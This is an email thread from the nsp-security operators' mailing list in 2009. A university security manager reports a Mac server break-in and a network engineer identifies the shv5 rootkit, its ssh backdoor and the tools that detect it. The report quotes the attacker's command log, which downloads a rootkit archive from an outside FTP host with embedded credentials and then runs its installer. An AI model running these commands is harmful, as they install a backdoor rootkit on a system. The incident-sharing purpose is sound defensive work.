[nsp-sec] MAC root kit found on www.funmangames.com 208.113.230.135- ASN 26347

Smith, Donald Donald.Smith at qwest.com
Mon Mar 30 16:07:38 EDT 2009


Oh, probably, but it's not too big a deal; there are copies of it all over the place.
I grabbed a copy and, if/when I get the time, will compare this to other versions of this root kit I have looked at in the past.


Security through obscurity WORKS against some worms and ssh attacks:)
Donald.Smith at qwest.com gcia 

> -----Original Message-----
> From: Joel Rosenblatt [mailto:joel at columbia.edu] 
> Sent: Monday, March 30, 2009 1:18 PM
> To: Smith, Donald
> Cc: Joel Rosenblatt; nsp-security at puck.nether.net
> Subject: RE: [nsp-sec] MAC root kit found on 
> www.funmangames.com 208.113.230.135- ASN 26347
> 
> Thanks Donald.
> 
> Our standard fix is nuke and pave .. I meant removed from the 
> machine serving it :-)
> 
> Regards,
> Joel
> 
> --On Monday, March 30, 2009 12:49 PM -0600 "Smith, Donald" 
> <Donald.Smith at qwest.com> wrote:
> 
> > That is shv5, a unix root kit. They may have updated it to
> > compile on macs, but it's been around for years.
> > It can be removed.
> > Rootkit hunter can detect it.
> > http://www.rootkit.nl/articles/rootkit_hunter_changelog.html
> > chkrootkit also finds it. http://www.chkrootkit.org
> >
> > Primarily it puts up a back door ssh and trojans several binaries.
> >
> > Security through obscurity WORKS against some worms and ssh
> > attacks:)
> > Donald.Smith at qwest.com gcia
> >
> >> -----Original Message-----
> >> From: nsp-security-bounces at puck.nether.net
> >> [mailto:nsp-security-bounces at puck.nether.net] On Behalf Of
> >> Joel Rosenblatt
> >> Sent: Monday, March 30, 2009 12:01 PM
> >> To: nsp-security at puck.nether.net
> >> Subject: [nsp-sec] MAC root kit found on www.funmangames.com
> >> 208.113.230.135- ASN 26347
> >>
> >> ----------- nsp-security Confidential --------
> >>
> >> Hi,
> >>
> >> We had a break-in of a Mac server (bad root password .. duh)
> >> - upon going through the log of commands run, we came across
> >>
> >> curl -O ftp://haddd:itrules@www.funmangames.com/kit5.tar
> >>
> >> tar xzf kit5.tar
> >>
> >> ls -a
> >>
> >> cd shv5
> >>
> >> ./setup abelha 54
> >>
> >> It appears to be a Mac root kit.
> >>
> >> AS      | IP               | AS Name
> >> 26347   | 208.113.230.135  | DREAMHOST-AS - New Dream Network, LLC
> >>
> >> I wonder if it could be removed.
> >>
> >> Thanks,
> >> Joel Rosenblatt
> >>
> >> Joel Rosenblatt, Manager Network & Computer Security
> >> Columbia Information Security Office (CISO)
> >> Columbia University, 612 W 115th Street, NY, NY 10025 / 212 854 3033
> >> http://www.columbia.edu/~joel
> >>
> >> _______________________________________________
> >> nsp-security mailing list
> >> nsp-security at puck.nether.net
> >> https://puck.nether.net/mailman/listinfo/nsp-security
> >>
> >> Please do not Forward, CC, or BCC this E-mail outside of the
> >> nsp-security
> >> community. Confidentiality is essential for effective
> >> Internet security counter-measures.
> >> _______________________________________________
> >>
>
> Joel Rosenblatt, Manager Network & Computer Security
> Columbia Information Security Office (CISO)
> Columbia University, 612 W 115th Street, NY, NY 10025 / 212 854 3033
> http://www.columbia.edu/~joel